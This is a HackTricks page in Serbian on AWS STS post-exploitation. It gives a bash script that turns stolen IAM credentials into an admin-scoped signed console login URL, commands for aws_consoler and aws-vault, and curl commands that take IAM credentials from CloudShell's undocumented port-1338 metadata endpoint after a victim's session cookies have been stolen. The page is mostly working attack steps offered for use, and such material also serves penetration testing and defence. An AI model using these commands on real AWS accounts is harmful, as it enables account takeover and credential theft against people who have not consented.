AWS - STS Post Exploitation

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

STS

Za više informacija:

AWS - IAM, Identity Center & SSO Enum

Od IAM kredencijala do konzole

Ako ste uspeli da dobijete neke IAM kredencijale, možda ćete biti zainteresovani za pristupanje web konzoli koristeći sledeće alate. Imajte na umu da korisnik/uloga mora imati dozvolu sts:GetFederationToken.

Prilagođeni skript

Sledeći skript će koristiti podrazumevani profil i podrazumevanu lokaciju AWS-a (ne gov i ne cn) kako bi vam pružio potpisan URL koji možete koristiti za prijavljivanje unutar web konzole:

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)



# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

Možete generisati link za web konzolu sa https://github.com/NetSPI/aws_consoler.

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

Proverite da IAM korisnik ima dozvolu sts:GetFederationToken, ili obezbedite ulogu za preuzimanje.

aws-vault

aws-vault je alat za sigurno čuvanje i pristup AWS akreditacijama u razvojnom okruženju.

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

Možete takođe koristiti aws-vault da biste dobili sesiju konzole pretraživača

Od konzole do IAM kredencijala

Originalno otkriveno u ovom postu, Ako uspete da kompromitujete pristup web konzoli (možda ste ukrali kolačiće i niste mogli da pristupite .aws fascikli), možete dobiti neke IAM token kredencijale za tog korisnika putem CloudShell.

CloudShell izlaže IAM kredencijale putem nedokumentovanog endpointa na portu 1338. Nakon što učitate sesijske kolačiće žrtve u svoj pretraživač, možete navigirati do CloudShell-a i izdati sledeće komande da biste dobili IAM kredencijale.

TOKEN=$(curl -X PUT localhost:1338/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
curl localhost:1338/latest/meta-data/container/security-credentials -H "X-aws-ec2-metadata-token: $TOKEN"
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini da podržite HackTricks:

Last updated